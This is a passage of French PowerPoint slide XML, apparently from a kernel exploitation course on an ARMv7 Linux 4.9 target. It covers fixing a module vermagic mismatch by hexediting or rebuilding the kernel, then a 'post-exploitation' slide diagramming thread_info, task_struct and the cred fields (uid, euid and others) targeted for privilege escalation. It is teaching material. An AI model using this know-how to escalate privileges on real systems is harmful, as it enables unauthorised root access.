              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="85556" y="1844628"/>
            <a:ext cx="9068798" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>version </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>magic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4.9.0 SMP mod_unload ARMv7 p2v8</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>‘ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>should</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>be</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="da-DK" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>4.9.44+ SMP mod_unload ARMv7 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>’</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="ZoneTexte 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E0286A6-CCAF-57B7-30E6-66D8A150BAE3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="365126" y="2296038"/>
            <a:ext cx="8509659" cy="507831"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Solution sale patcher la strings dans le .ko avec </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>hexedit</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Solution : télécharger un kernel proche ( 4.9.44) et le configurer jusqu’à obtenir la bonne </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1"/>
              <a:t>magic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t> version</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="ZoneTexte 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8E498B89-52B7-5CDD-58A5-9590F57F5793}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2284095" y="3055333"/>
            <a:ext cx="4575810" cy="1131079"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>export ARCH=arm</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>export CROSS_COMPILE=arm-linux-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gnueabihf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HOSTCC=gcc-9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>versatile_defconfig</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HOSTCC=gcc-9 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>prepare</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>make</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> HOSTCC=gcc-9 scripts</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="Espace réservé du texte 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5D0CD279-AE31-1630-9A7C-35C5E2F79DA3}"/>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5" name="Espace réservé du texte 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CE7CC96B-7B07-CEDE-B3BE-0403DEC7D029}"/>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Post-exploitation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="426935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2E05E15-DE84-CC84-7031-09B9765C2899}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{767457D1-F337-7141-A4C4-1AF9EC9D8474}" type="slidenum">
              <a:rPr lang="fr-FR" smtClean="0"/>
              <a:pPr/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="fr-FR" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Espace réservé de la date 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0D33DC83-0725-42ED-FA29-546BDF5A204A}"/>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1290E33F-EB1B-41B4-648E-AE19D9E22F05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0"/>
              <a:t>Post-exploitation : Théorie</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Rectangle 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2F499646-92A0-1AE0-6A65-E33F481F393D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1249679" y="4227746"/>
            <a:ext cx="1787256" cy="2620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task</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="Rectangle 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9FB319D3-3EA3-17DB-93A7-E99ADEFB6A0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1249678" y="4489751"/>
            <a:ext cx="1789040" cy="2577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11" name="Rectangle 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F92BCE90-E38F-D396-25FC-B1744E3CBA14}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3784629" y="2677970"/>
            <a:ext cx="1574742"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cred</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Rectangle 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{65960A40-2E78-CCAC-02CE-E59DDC799829}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3784629" y="3101634"/>
            <a:ext cx="1574742" cy="7499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comm</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="Rectangle 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{075F9BC8-88EA-78C2-BAE9-15F6A6A9C96B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3784629" y="3851586"/>
            <a:ext cx="1574742"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14" name="Rectangle 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2DC5E0CF-89A4-3B73-2056-8F74EFE40C21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="3784629" y="2252768"/>
            <a:ext cx="1574742"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15" name="Rectangle 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1EF4B20-91A3-2B46-B744-A7FD16268CEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="2040029"/>
            <a:ext cx="1993628" cy="4098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16" name="Rectangle 15">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{01A46024-F53A-E755-4B74-FE06A9B262EE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434090" y="2449863"/>
            <a:ext cx="1993628" cy="2653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uid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="Rectangle 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{140C16D0-FD2E-8445-351D-30F9F65C5384}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="2718693"/>
            <a:ext cx="1993628" cy="2653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gid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Rectangle 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9071374A-BA0A-8130-AB29-2DC9F79B389D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="2984029"/>
            <a:ext cx="1993628" cy="2632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suid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Rectangle 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{003FF79E-8FDD-C30A-F2F6-39AEF08557C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="3247246"/>
            <a:ext cx="1993628" cy="26321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sgid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Rectangle 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FC5D21B5-9A99-DC19-A291-CB623E0E8443}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="3513637"/>
            <a:ext cx="1993628" cy="2656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euid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Rectangle 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1111853F-0E8F-0B24-FED3-F80F7B9C81DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="3779130"/>
            <a:ext cx="1993628" cy="26565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mj-lt"/>
              </a:rPr>
              <a:t>egid</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="+mj-lt"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Rectangle 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DBA5C2D4-C40D-FBD0-C632-857AB8A5D349}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="6434092" y="4040734"/>
            <a:ext cx="1993628"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23" name="Rectangle 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A8A0E79-1F0D-4455-02CF-AAFCC7FDB35A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1249678" y="3272089"/>
            <a:ext cx="1787256" cy="6979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4" name="Rectangle 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{779D2D24-C06E-BDE0-773B-2B8073DC4BB5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="1249678" y="1904120"/>
            <a:ext cx="1787255" cy="13679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5" name="Flèche : bas 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5243260F-7004-BDEC-D68B-11AE8AD915D1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1891279" y="1928920"/>
            <a:ext cx="504056" cy="93610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Accolade ouvrante 26">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C7FE6DA2-D15D-B92D-832B-C516E768FA86}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="940580" y="3970021"/>
            <a:ext cx="175557" cy="76435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a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D4B97A3B-39BE-24C5-2BAA-E5134704F044}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-73421" y="4174936"/>
            <a:ext cx="1117361" cy="261610"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="fr-FR" sz="1100" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>thread_info</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" sz="1100" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="29" name="Connecteur : en angle 28">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2B514AB5-48DC-FF89-00C3-34811C40FF8D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="8" idx="1"/>
            <a:endCxn id="14" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="3036935" y="2464600"/>
            <a:ext cx="747694" cy="189414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ngle 29">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7BC85BCE-B9FF-EF35-5337-8349C5E587CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
            <a:stCxn id="11" idx="1"/>
            <a:endCxn id="15" idx="3"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipV="1">
            <a:off x="5359371" y="2244946"/>
            <a:ext cx="1074721" cy="64485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BDBB072F-9B50-2B5B-F4C8-C05EFFAB968D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3784628" y="1952687"/>
            <a:ext cx="1574744" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>task_struct</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="ZoneTexte 31">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A221052E-D9CE-78B4-F224-D6996403A544}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6434092" y="1739947"/>
            <a:ext cx="1993628" cy="300082"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="fr-FR" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>cred</a:t>
            </a:r>
            <a:endParaRPr lang="fr-FR" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="38" name="Rectangle 37">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2CC11E8-3F83-6FDC-47C8-6C7CC54D3B9D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
